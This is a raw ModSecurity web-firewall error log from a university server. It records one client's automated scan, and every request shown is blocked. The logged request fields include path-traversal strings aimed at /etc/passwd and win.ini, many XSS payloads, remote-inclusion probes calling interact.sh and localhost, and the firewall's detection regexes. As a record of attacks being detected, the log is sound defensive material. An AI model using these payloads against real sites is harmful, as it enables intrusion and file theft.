[Tue Aug 29 11:56:23.231307 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16d8Co-f0AAAq5@QMAAAAK"]
[Tue Aug 29 11:56:23.535687 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22\\x22  found within ARGS:message: <img src=\\x22\\x22 onerror=\\x22alert(1);\\x22>1</img>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/Pacs/login.php"] [unique_id "ZO16d8Co-f0AAAocyh0AAAAR"]
[Tue Aug 29 11:56:23.665953 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:searchTerm: x' alert(1) 'x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16d8Co-f0AAArIATAAAAAX"]
[Tue Aug 29 11:56:24.746542 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ),// found within ARGS:searchTerm: x\\x5c' alert(1),//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16eMCo-f0AAArLLdcAAAAb"]
[Tue Aug 29 11:56:26.942729 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:referer. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:referer: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/src/login.php"] [unique_id "ZO16esCo-f0AAArIAUoAAAAX"]
[Tue Aug 29 11:56:27.252966 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:redirect_to: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16e8Co-f0AAAqeFogAAAAx"]
[Tue Aug 29 11:56:30.084830 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:class_key: ../../../../../../../../../../windows/win.ini\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/manager/controllers/default/resource/tvs.php"] [unique_id "ZO16fsCo-f0AAAq3a-QAAAAI"]
[Tue Aug 29 11:56:30.534747 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:page: \\x22/></script><script>alert(document.domain)</script><b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php"] [unique_id "ZO16fsCo-f0AAAoAlB0AAAAC"]
[Tue Aug 29 11:56:30.625512 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/php/ssh_form.php"] [unique_id "ZO16fsCo-f0AAAoAlCEAAAAC"]
[Tue Aug 29 11:56:33.597691 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:a</script><script>alert(/XSS/)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:a</script><script>alert(/XSS/)</script>: a</script><script>alert(/XSS/)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/aa404bb"] [unique_id "ZO16gcCo-f0AAAocykQAAAAR"]
[Tue Aug 29 11:56:34.590967 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:srch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:srch: x\\x22 onmouseover=alert(1) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16gsCo-f0AAAoz8LAAAAAS"]
[Tue Aug 29 11:56:36.637568 2023] [:error] [pid 2759] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/home/get_products"] [unique_id "ZO16hMCo-f0AAArHa4gAAAAJ"]
[Tue Aug 29 11:56:36.692552 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:class: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16hMCo-f0AAAolK3sAAAAe"]
[Tue Aug 29 11:56:37.734928 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: 16170297</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16hcCo-f0AAAqeFrYAAAAx"]
[Tue Aug 29 11:56:39.575450 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:user: j\\x22;-alert(1)-\\x22x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/global-protect/login.esp"] [unique_id "ZO16h8Co-f0AAArIAVsAAAAX"]
[Tue Aug 29 11:56:39.588008 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:indexFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:indexFile: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16h8Co-f0AAArZPxsAAAAC"]
[Tue Aug 29 11:56:39.749414 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:searchdata. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:searchdata: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/search-request.php"] [unique_id "ZO16h8Co-f0AAAq-HdoAAAAT"]
[Tue Aug 29 11:56:40.832027 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAAocylwAAAAR"]
[Tue Aug 29 11:56:40.863697 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:viewit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:viewit: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAAq5@TYAAAAK"]
[Tue Aug 29 11:56:42.872052 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16isCo-f0AAAoz8NIAAAAS"]
[Tue Aug 29 11:56:43.807194 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/osclass/oc-admin/index.php"] [unique_id "ZO16i8Co-f0AAAocynUAAAAR"]
[Tue Aug 29 11:56:44.594530 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/advanced-text-widget/advancedtext.php"] [unique_id "ZO16jMCo-f0AAArIAYQAAAAX"]
[Tue Aug 29 11:56:44.651228 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/redirect-to"] [unique_id "ZO16jMCo-f0AAAolK5EAAAAe"]
[Tue Aug 29 11:56:45.573733 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:668818/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/ueditor/php/controller.php"] [unique_id "ZO16jcCo-f0AAAocynkAAAAR"]
[Tue Aug 29 11:56:46.562859 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:040146/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/ueditor/jsp/controller.jsp"] [unique_id "ZO16jsCo-f0AAArIAYsAAAAX"]
[Tue Aug 29 11:56:47.537862 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/scripts/wa.exe"] [unique_id "ZO16j8Co-f0AAAoz8OMAAAAS"]
[Tue Aug 29 11:56:47.608856 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:URLPARAMETER. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:URLPARAMETER: file:///"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/reports/rwservlet"] [unique_id "ZO16j8Co-f0AAAoz8OUAAAAS"]
[Tue Aug 29 11:56:47.608913 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/components/com_ionfiles/download.php"] [unique_id "ZO16j8Co-f0AAAqsWBkAAAAB"]
[Tue Aug 29 11:56:48.591395 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/scripts/wa-HAP.exe"] [unique_id "ZO16kMCo-f0AAArIAZ4AAAAX"]
[Tue Aug 29 11:56:48.672186 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:at. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:at: <svg onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/dokuwiki/doku.php"] [unique_id "ZO16kMCo-f0AAAqsWCEAAAAB"]
